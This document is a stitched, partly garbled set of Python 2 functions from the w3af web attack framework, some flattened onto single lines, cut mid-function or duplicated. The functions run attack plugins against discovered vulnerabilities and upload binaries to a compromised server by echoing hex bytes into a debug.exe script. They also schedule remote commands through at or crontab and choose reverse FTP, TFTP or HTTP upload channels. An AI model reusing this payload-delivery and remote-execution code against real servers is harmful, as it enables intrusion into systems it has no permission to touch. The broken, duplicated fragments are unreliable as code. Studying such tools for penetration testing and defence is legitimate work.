def _exploit( self , pluginName, params, showList=True): ''' Exploits a vuln. using a single plugin. ''' # Did the user indicated what vulnerability to exploit ? if len( params ) == 1: try: vulnToExploit = params[0] if vulnToExploit != '*': vulnToExploit = int(params[0]) except: raise w3afException( 'You specified an invalid vulnerability id.' ) else: vulnToExploit = None if pluginName not in self._configs: raise w3afException( 'Unknown plugin. Use the list command to view available plugins.' ) else: self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' ) try: response = plugin.canExploit( vulnToExploit ) except w3afException, e: raise e else:
def _configExploit( self, params ):
    '''
    Look up the configuration object of the attack plugin named on the
    console command line.

    @param params: The command arguments; exactly one element, the plugin
                   name, is expected.
    @return: The entry of self._configs registered under that plugin name.
    @raise w3afException: If no plugin name was given, if more than one
                          argument was given, or if the name is not a key of
                          self._configs.
    '''
    if len( params ) < 1:
        raise w3afException( 'Plugin name was expected.')

    pluginName, extra = params[0], params[1:]
    if extra:
        raise w3afException( 'Unexpected parameters: ' + ','.join(extra) )

    if pluginName in self._configs:
        return self._configs[pluginName]
    raise w3afException( "Unknown plugin " + pluginName)
def transfer( self, strObject, destination ):
    '''
    This method is used to transfer the strObject from w3af to the compromised server.

    The payload is written to a remote text file with a series of "echo ... >>"
    commands sent through self._exec_method, turned into a binary by the remote
    debug.exe, and finally renamed to carry the extension of "destination".

    @param strObject: The payload to upload. It is iterated one element at a
                      time and each element is passed to ord(), so it is
                      presumably a Python 2 byte string (str) -- confirm.
    @param destination: The remote path; used to derive the temporary file name
                        (self._getFilename) and the final extension
                        (self._getExtension).
    @return: None. The result of the final "move" command is not inspected.
    @raise w3afException: If canTransfer() returns False, or if the remote
                          debug.exe output contains "file creation error".
    '''
    om.out.debug('Starting upload.')
    self._filename = self._getFilename( destination )

    # Check if echo exists and works as expected
    # NOTE(review): this attribute name looks like a mangled
    # "_executedCanTransfer" (a global replace of "_exec"?). Confirm it is set
    # under exactly this name in __init__, otherwise this raises AttributeError
    # before any command is sent.
    if not self._exec_methodutedCanTransfer:
        if not self.canTransfer():
            raise w3afException('Failed to transfer file to the compromised server, echoWin.canTransfer returned False.')

    # if exists, delete _filename
    # NOTE(review): "res" is overwritten below without being read, so a failed
    # delete is never reported here.
    res = self._exec_method('del ' + self._filename )

    # Prepare the scr file.
    # Every line is appended to self._filename with "echo ... >>"; the length of
    # the payload is written as a bare hex string (no "0x" prefix).
    self._exec_method( 'echo n ' + self._filename + '._ >> ' + self._filename )
    self._exec_method( 'echo r cx' + ' >> ' + self._filename )
    self._exec_method( 'echo ' + hex(len(strObject))[2:] + ' >> ' + self._filename)
    self._exec_method( 'echo f 0000 ffff 00' + ' >> ' + self._filename )

    # http://www.totse.com/en/technology/computer_technology/windowsdebugco172680.html
    # i is the offset into strObject; j is the value written after "e", starting
    # at 256 (0x100). Both advance by self._step per chunk.
    i = 0
    j = 256
    while i < len( strObject ):
        # Prepare the command
        cmd = "echo e " + hex(j)[2:]
        for c in strObject[i:i+self._step]:
            # two hex digits per element, zero padded
            cmd += ' ' + hex(ord(c))[2:].zfill(2)
        cmd += " >> " + self._filename
        i += self._step
        j += self._step
        # Send the command to the remote server
        self._exec_method( cmd )

    # "close" the scr file
    self._exec_method( 'echo w >> ' + self._filename )
    self._exec_method( 'echo q >> ' + self._filename )

    # Now, I transform the text file into a exe
    # this trick was taken from sqlninja!
    om.out.debug('Transforming the text file into a binary file. Thanks to icesurfer and sqlninja for this technique!')
    res = self._exec_method( 'debug < ' + self._filename )
    # Only this one error string is recognised; other failures go unnoticed here.
    if 'file creation error' in res.lower():
        raise w3afException('Error in remote debug.exe command.')

    extension = self._getExtension( destination )
    # NOTE(review): the empty "()" in this message looks like a missing
    # placeholder for the extension.
    om.out.debug('Changing the extension of the binary file to match the original one ()')
    # The "._" file produced by debug.exe is renamed to the destination's
    # extension; the command result is not checked.
    res = self._exec_method( 'move ' + self._filename + '._ ' + self._filename + '.' + extension )
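def _createCronLine( self, remoteDate, commandToExec ):
    '''
    Creates a crontab line that executes the command one minute after the
    "date" parameter.

    @param remoteDate: The output of ``date +"%d-%m-%H:%M:%S-%u"`` on the
                       remote host, i.e. ``DD-MM-HH:MM:SS-U``.
    @param commandToExec: The command to place in the crontab line.
    @return: A tuple with the new line to add to the crontab, and the time
             (in seconds) that it will take to run the command.
    @raise w3afException: If remoteDate does not have the expected format
                          (wrong number of fields or non-numeric values).
    '''
    try:
        # date +"%d-%m-%H:%M:%S-%u"
        dayNumber, month, hour, weekDay = remoteDate.split('-')
        # The second split and the int() conversions can fail on unexpected
        # output too, so they are guarded by the same handler.
        hour, minute, sec = hour.split(':')
        minute = int( minute )
        sec = int( sec )
    except (ValueError, AttributeError):
        # ValueError: wrong field count or non-numeric field;
        # AttributeError: remoteDate is not a string.
        raise w3afException('The date command of the remote server returned an unknown format.')

    if sec > 57:
        # Too close to the next minute: schedule one minute further out and
        # wait a little longer than a full minute. Just to be 100% sure...
        delta = 2
        waitTime = 4 + 60
    else:
        delta = 1
        waitTime = 60 - sec

    minute = minute + delta
    # _fixTime presumably normalises a minute value >= 60 (and the hour with
    # it); its third element (am/pm marker) is not used in a crontab line.
    hour, minute, _amPm = self._fixTime( hour, minute )

    # crontab field order: minute hour day-of-month month day-of-week command
    fields = [minute, hour, dayNumber, month, weekDay]
    resLine = ' '.join( str(f) for f in fields ) + ' ' + commandToExec
    return resLine, waitTime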
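def _cmd_fastexploit( self , parameters, showList=True):
    '''
    Performs fast exploiting based on the parameters provided by the user,
    and the previous plugin configuration.

    @param parameters: The console arguments; the first one is the name of
                       the attack plugin to run.
    @param showList: When True, the list of shell objects is printed after a
                     successful run.
    @raise w3afException: If the plugin returned no shell objects. Exceptions
                          raised by the plugin itself propagate unchanged.
    '''
    # I need this to have logging!
    self._w3af.plugins.init_plugins()

    if not len( parameters ):
        om.out.console( 'Incorrect call to fastexploit, please see the help:' )
        self._cmd_help( ['fastexploit'] )
        return

    pluginName = parameters[0]
    if pluginName not in self._w3af.plugins.getPluginList('attack'):
        om.out.console( 'Unknown plugin. Use the list command to view available plugins.' )
        return

    self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' )
    exploit_result = plugin.fastExploit()

    if not exploit_result:
        raise w3afException( 'Failed to exploit vulnerability.')

    # Assign a unique identifier to each new shell: its future index in
    # self._exploitResults, so ids stay unique across successive calls.
    firstId = len( self._exploitResults )
    for shellId, shell in enumerate( exploit_result, firstId ):
        shell.setExploitResultId( shellId )
    self._exploitResults.extend( exploit_result )

    # Without the list the two messages share one console line.
    om.out.console( 'Vulnerability successfully exploited. ' , newLine=not showList )
    if showList:
        self._show()
    om.out.console( 'Please use the interact command to interact with the shell objects.' )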
def getPriority( self ):
    '''
    Return the priority used when sorting mangle plugins.

    Each mangle plugin must override this method; this base implementation
    only reports the missing override.

    @return: An integer specifying the priority. 100 is run first, 0 last.
    @raise w3afException: Always, since the base class does not implement it.
    '''
    msg = 'Plugin is not implementing required method getPriority'
    raise w3afException( msg )
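def getDelayedExecutionHandler( self ):
    '''
    Build the delayed-execution handler that matches the remote operating
    system.

    The OS is detected with osDetectionExec over self._execMethod; 'windows'
    yields an atHandler and 'linux' a crontabHandler, both wrapping
    self._execMethod.

    @return: An atHandler or crontabHandler instance.
    @raise w3afException: If the detected OS is neither 'windows' nor 'linux'.
    '''
    # Named remoteOs so the stdlib "os" module is not shadowed.
    remoteOs = osDetectionExec( self._execMethod )
    if remoteOs == 'windows':
        return atHandler( self._execMethod )
    if remoteOs == 'linux':
        return crontabHandler( self._execMethod )
    raise w3afException('Failed to create a delayed execution handler.')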
def mangleResponse(self, response ):
    '''
    Mangle an HTTP response.

    Every mangle plugin MUST override this method; the base implementation
    only reports the missing override.

    @param response: The response to mangle.
    @return: A mangled version of the response (in subclasses).
    @raise w3afException: Always, since the base class does not implement it.
    '''
    msg = 'Plugin is not implementing required method mangleResponse'
    raise w3afException( msg )
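def _createAtCommand( self, time, command ):
    '''
    Creates an at command based on the time and command parameter.

    This is the format I'm expecting for the time parameter (the output of the
    remote "time" command)::

        The current time is: 11:24:19.59
        Enter the new time:

    Windows 2000 separates the fractional seconds with '.', Windows XP with
    ','; both are accepted.

    @param time: The raw output of the remote "time" command.
    @param command: The command to schedule.
    @return: A tuple with the "at" command, and the time (in seconds) that it
             will take to run the command.
    @raise w3afException: If the time parameter does not have the expected
                          format (missing or non-numeric fields).
    '''
    try:
        # Keep the first line only and drop the "The current time is" label.
        fields = time.split('\n')[0].split(':')[1:]
        hour = fields[0]
        minute = int( fields[1] )
        # Fractional seconds: '.' on Windows 2000, ',' on Windows XP.
        separator = '.' if '.' in fields[2] else ','
        seconds = int( fields[2].split(separator)[0] )
        # The hour is kept as a string for _fixTime, but must be numeric.
        int( hour )
    except (ValueError, IndexError, AttributeError):
        # ValueError: non-numeric field; IndexError: too few fields;
        # AttributeError: time is not a string.
        raise w3afException('The time command of the remote server returned an unknown format.')

    # TODO: the previous code derived an am/pm marker from the hour, but both
    # branches produced ''. Check whether the "at" command really needs one.
    amPm = ''

    if seconds > 57:
        # Too close to the next minute: schedule one minute further out and
        # wait a little longer than a full minute. Just to be 100% sure...
        delta = 2
        waitTime = 60 + 5
    else:
        delta = 1
        waitTime = 60 - seconds

    minute = minute + delta
    hour, minute, amPm = self._fixTime( hour, minute, amPm )
    res = 'at ' + str(hour) + ':' + str( minute ).zfill(2) + amPm + ' ' + command
    return res, waitTime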
def _exploitAll( self, params ):
    '''
    Run every attack plugin that reports it can exploit against every
    vulnerability stored in the knowledge base, printing progress to the
    console and listing the shells obtained at the end.

    @param params: Optional console arguments. The only accepted value is
                   'stopOnFirst', which stops after the first successful
                   exploit.
    @raise w3afException: If any other parameter is passed.
    '''
    # NOTE(review): lp is never used.
    lp = len(params)
    stopOnFirst = len(params)>0 and params[0] =='stopOnFirst'
    # Number of parameters accepted: 1 when 'stopOnFirst' was given, else 0.
    maxLen = int(stopOnFirst)
    if len(params)>maxLen:
        raise w3afException( 'Unexpected parameters: ' + \
                             ','.join(params[maxLen:]))

    vuln_list = kb.kb.getAllVulns()
    if not vuln_list:
        # NOTE(review): message should read "There are no ...".
        om.out.console('They are no vulnerabilities to exploit.')
    else:
        attackPluginList = self._w3af.plugins.getPluginList( 'attack' )
        #Now I create the instances...
        instanceList = []
        for pluginName in attackPluginList:
            instanceList.append( self._w3af.plugins.getPluginInstance( pluginName, 'attack' ) )

        # Its time to sort...
        # Python 2 only (cmp and a comparison function); orders the plugins by
        # descending root probability.
        def sortfunc(x,y):
            # reverse ordering...
            return cmp( y.getRootProbability(), x.getRootProbability() )
        instanceList.sort( sortfunc )

        # To have a nicer console ;)
        not_run = []
        # Cleared only when stopOnFirst triggers; checked at the top of the
        # outer loop so the remaining plugins are skipped.
        continue_exploiting = True
        # Exploit !
        for ap in instanceList:
            if not continue_exploiting:
                break
            # NOTE(review): canExploit() is called with no argument here,
            # while _exploit calls it with a vulnerability id elsewhere on
            # this page -- confirm the parameter is optional.
            if not ap.canExploit():
                # save to report later
                not_run.append(ap.getName())
            else:
                # can exploit!
                msg = 'Executing '+ ap.getName() +'.attack plugin to all vulnerabilities:'
                om.out.console( msg )
                for vuln_obj in vuln_list:
                    continue_exploiting = True
                    msg = '- Exploiting vulnerability with id:' + str(vuln_obj.getId())
                    om.out.console( msg )
                    try:
                        # showList=False: the shells are listed once, below.
                        self._exploit( ap.getName() , vuln_obj.getId(), showList=False )
                    except w3afException, w:
                        # NOTE(review): redundant, the flag is already True
                        # at this point; the failure is only reported.
                        continue_exploiting = True
                        om.out.console( str(w) )
                    else:
                        # We get here when the exploit was successful
                        if stopOnFirst:
                            continue_exploiting = False
                            break

        om.out.console('')
        msg = 'The following plugins weren\'t run because they can\'t exploit any of the'
        msg += ' previously discovered vulnerabilities: ' + ', '.join(not_run)
        om.out.console( msg )
        om.out.console('')
        if self._exploitResults:
            self._show()
            om.out.console( 'Please use the "interact" command to use the shell objects.' )
raise w3afException( 'You specified an invalid vulnerability id.' ) else: vulnToExploit = None if pluginName not in self._configs: raise w3afException( 'Unknown plugin. Use the list command to view available plugins.' ) else: self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' ) try: response = plugin.canExploit( vulnToExploit ) except w3afException, e: raise e else: if not response: raise w3afException( 'No exploitable vulnerabilities found.' ) else: try: exploit_result = plugin.exploit( vulnToExploit ) except w3afMustStopException, w3mse: raise w3afException( str(w3mse) ) except w3afException, w3: raise w3 else: # everything went ok! if not exploit_result: raise w3afException( 'Failed to exploit vulnerability.') else: # Assign a unique identifier to this shell for i in range(len(self._exploitResults), len(exploit_result) ): exploit_result[i].setExploitResultId( i )
def getSpeed( self ):
    '''
    Return the relative speed of this transfer method.

    Subclasses must override this; the base implementation only reports the
    missing override.

    @return: A number between 100 (fast) and 1 (slow), in subclasses.
    @raise w3afException: Always, since the base class does not implement it.
    '''
    msg = 'You should implement the getSpeed method when you inherit from echo.'
    raise w3afException( msg )
def transfer( self, strObject, destination ):
    '''
    Transfer strObject from w3af to the compromised server.

    Subclasses must override this; the base implementation only reports the
    missing override.

    @param strObject: The content to transfer.
    @param destination: The remote destination path.
    @raise w3afException: Always, since the base class does not implement it.
    '''
    msg = 'You should implement the transfer method when you inherit from basePayloadTransfer.'
    raise w3afException( msg )
def estimateTransferTime( self, size ):
    '''
    Estimate how long transferring a file of the given size would take.

    Subclasses must override this; the base implementation only reports the
    missing override.

    @param size: The size of the file to transfer.
    @return: An estimated transfer time for a file with the specified size,
             in subclasses.
    @raise w3afException: Always, since the base class does not implement it.
    '''
    msg = 'You should implement the estimateTransferTime method when you inherit from basePayloadTransfer.'
    raise w3afException( msg )
def canTransfer( self ):
    '''
    Test whether this transfer method works as expected.

    Implementations are expected to transfer a small probe (around 10 bytes)
    and check that it arrived intact at the other end. The base
    implementation only reports the missing override.

    @return: True if the method works, in subclasses.
    @raise w3afException: Always, since the base class does not implement it.
    '''
    msg = 'You should implement the canTransfer method when you inherit from basePayloadTransfer.'
    raise w3afException( msg )
try: if not inboundPort: inboundPort = self._es.getInboundPort() except w3afException, w3: om.out.error( 'The extrusion test failed, no reverse connect transfer methods can be used. Trying inband echo transfer method.' ) om.out.error( 'Error: ' + str(w3) ) except Exception, e: om.out.error('Unhandled exception: ' + str(e) ) else: to_test.append( reverseFTP( self._exec_method, os, inboundPort ) ) if os == 'windows': to_test.append( clientlessReverseTFTP( self._exec_method, os, inboundPort ) ) elif os == 'linux': to_test.append( clientlessReverseHTTP( self._exec_method, os, inboundPort ) ) # Test the fastest first and return the fastest one... def sortFunction( x ,y ): return cmp( y.getSpeed() , x.getSpeed() ) to_test.sort( sortFunction ) for method in to_test: om.out.debug('Testing if "' + str(method) + '" is able to transfer a file to the compromised host.') if method.canTransfer(): om.out.debug('The "' + str(method) + '" method is able to transfer a file to the compromised host.') return method else: om.out.debug('The "' + str(method) + '" method *FAILED* to transfer a file to the compromised host.') raise w3afException('Failed to transfer a file to the remote host! All the transfer methods failed.')